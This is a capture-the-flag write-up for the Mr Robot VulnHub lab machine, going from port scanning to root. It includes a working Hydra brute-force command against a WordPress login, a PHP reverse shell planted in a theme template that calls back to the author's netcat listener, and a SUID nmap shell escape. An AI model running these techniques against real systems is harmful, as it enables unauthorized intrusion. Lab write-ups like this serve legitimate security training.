Mr Robot CTF

Available on Vulnhub

1. Enumeration

A quick and easy port scan:

nmap 192.168.18.45

mr robot nmap

Lets check out what’s running on port 80:

mr robot ctf website

This website doesn’t do too much, a few commands yet nothing progressive. Let’s look about some more. 

/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

Ok this looks interesting…

/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

Great we have our first key and have downloaded a dictionary file from /fsocity.dic

mr robot ctf wordlist

On further examination our fsociety.dic file of 858160 words appears to be messy and contains duplicates. We may need this for brute force attacks, let’s remove the duplicates.

sort fsocity.dic | uniq | wc -l
11451
cat fsocity.dic | sort | uniq > fsocity.txt

Great, we have reduced the dictionary file by 846709 words from 858160 to 11451.

Lets look around some more and fire up Dirbuster:

dirb http://192.168.18.45
/0

While dirb continues running, I checkout /0  (the first result ) and find ‘just another WordPress site’.

Ok let’s try the default WordPress login page /wp-admin. Great, a login page, i’ve watched the series let’s play about with some obvious entries.

Username and password ‘admin’ shows an ‘invalid username’ error. Username and password ‘elliot’ throws an ‘invalid password’ error. Great, so it looks like we have a valid username ‘elliot’. I wonder if we can brute force entry with our password list? Let’s fire up Burp Suite to figure how the login request is being sent to the server.

POST /wp-login.php HTTP/1.1
Host: 192.168.18.45
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.18.45/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
Cookie: s_cc=true; s_fid=1CA6116ACDD798E8-1D577C92DEB71639; s_nr=1552942461209; s_sq=%5B%5BB%5D%5D; wordpress_test_cookie=WP+Cookie+check
Connection: close
Upgrade-Insecure-Requests: 1

log=elliot&pwd=hi&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.18.45%2Fwp-admin%2F&testcookie=1

 

2. Exploitation

Now we can fire up Hydra to try brute force the password.

hydra -vV -l elliot -P fsocity.txt 192.168.18.45 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'

Wait a few minutes…

[80][http-post-form] host: 192.168.18.45   login: elliot   password: ER28-0652
1 of 1 target successfully completed, 1 valid password found

Great we have access to the WordPress CMS. Let’s get a shell, we will upload a php reverse shell into the 404 template.

On our Kali machine I copy the contents of /usr/share/webshells/php/php-reverse-shell.php and paste it into the /404 (via the default WordPress CMS editor) ensuring the values for the reverse connection are set to my own netcat listening machine on port 444.

mr robot ctf wordpress login

We hit save and set up a netcat listener nc -nlvp 444 . We then open a new browser tab and execute /404 to run our payload.

mr robot ctf reverse shell

Success, we have a shell. We now spawn a tty python -c 'import pty; pty.spawn("bin/sh")'

We snoop around, in /home we find /robot and inside we find a raw md5 hash ‘c3fcd3d76192e4007dfb496cca67e13b’ and key/flag 2 that we do not have permission to read. I googled the hash and the result is known to be ‘abcdefghijklmnopqrstuvwxyz’.

We now su robot and try the decrypted password. Success! we can now cat key-2-of-3.txt revealing the second flag ‘822c73956184f694993bede3eb39f959’.

3. Escalation

Time to root, looking around I decide to take a look at files with the SUID bit set.

find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

nmap? let’s see.

nmap -v
nmap -v

Starting nmap 3.81

A quick google of nmap 3.81 priv esc shows me I may be able to escape nmap into a shell.

*sudo nmap --interactive will show id as root.

nmap --interactive
nmap$ !sh
#id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
cd /root
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Pwned 😀